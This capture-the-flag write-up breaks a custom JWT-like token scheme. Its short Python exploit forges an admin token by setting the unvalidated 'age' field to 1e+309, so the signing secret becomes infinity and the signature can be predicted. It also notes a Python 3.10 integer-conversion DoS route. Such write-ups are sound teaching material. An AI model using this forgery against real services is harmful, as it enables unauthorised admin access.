
In this challenge, we are given a custom implementation of a JWT-like token system. And we have to break it.

Source Code Analysis

After checking out the app source code, we isolated the interesting part which is reported below.

import hashlib
import json
import os
import time

secret = int.from_bytes(os.urandom(128), "big")
hash_ = lambda a: hashlib.sha256(a.encode()).hexdigest()

def create_token(**userinfo):
    userinfo["timestamp"] = int(time.time())
    salted_secret = (secret ^ userinfo["timestamp"]) + userinfo["age"]
    data = json.dumps(userinfo)
    return data.encode().hex() + "." + hash_(f"{data}:{salted_secret}")

def decode_token(token):
    if not token:
        return None, "invalid token: please log in"

    datahex, signature = token.split(".")
    data = bytes.fromhex(datahex).decode()
    userinfo = json.loads(data) 
    salted_secret = (secret ^ userinfo["timestamp"]) + userinfo["age"]

    if hash_(f"{data}:{salted_secret}") != signature:
        return None, "invalid token: signature did not match data"
    return userinfo, None

Finding an attack surface

We asked our dear crypto-guys to check out the token generation, signing, and verification logic. After some discussion, they confirmed the initial suspicion: the crypto was sound as long as the secret couldn't be leaked, which didn't seem to be possible. That was our confirmation that the challenge was indeed a pure web challenge and not some mix of web and crypto stuff.

Proper input validation was in place because the application uses FastAPI which relies on Pydantic to validate the types used in the API requests.

What we noticed, however, is that the received token fields are not really validated in any way before being used.

Juggling types for fun and profit

So we started playing around with the only part we could control, starting with the values used to salt the secret:


Adding floats can easily cause weird things to happen, for example NaNs or various sorts of infinitys.

Thanks to the magical properties of floating point numbers we know that near the representable limits we have a loss of precision which manifests in the following ways:

The secret is a 128 bytes long random number, which has an extremely high probability of being higher than (10^{292}).

This means that summing secret ^ timestamp with sys.float_info.max is always going to be +infinity, which Python represents as inf.

Thus, we can forge a "Jason Web Token" as we wish because we know that salted_secret will be inf. Thus creating a token with the admin role is trivial.

The exploit

import requests
import hashlib

hash_ = lambda a: hashlib.sha256(a.encode()).hexdigest()

data = '{"username": "UncleTed", "role": "admin", "age": 1e+309, "timestamp": 0}'
token = data.encode().hex() + '.' + hash_(data+':inf')
requests.get('', cookies={'token': token}).text

The flag revealed is: lactf{pr3v3nt3d_th3_d0s_bu7_47_wh3_c0st}


The flag didn't make any sense to us, which suggested that the exploit used was not really the intended one. A quick chat with the authors confirmed our suspicions. We just knew it involved using a DoS to somehow extract information about the secret.

After a bit of googling, we found an interesting article about integer-to-string conversion in Python 3.10: it operates in (O(d^2)) time, where (d) is the length in digits of the number. This behavior was changed in Python 3.11: integers are now capped at 4300 digits by default.

The challenge was indeed using Python 3.10, as we can see in the first line of the Dockerfile: FROM python:3.10.

We weren't motivated enough to implement the intended solution because we already got our nice flag, so we won't explain how that should have worked.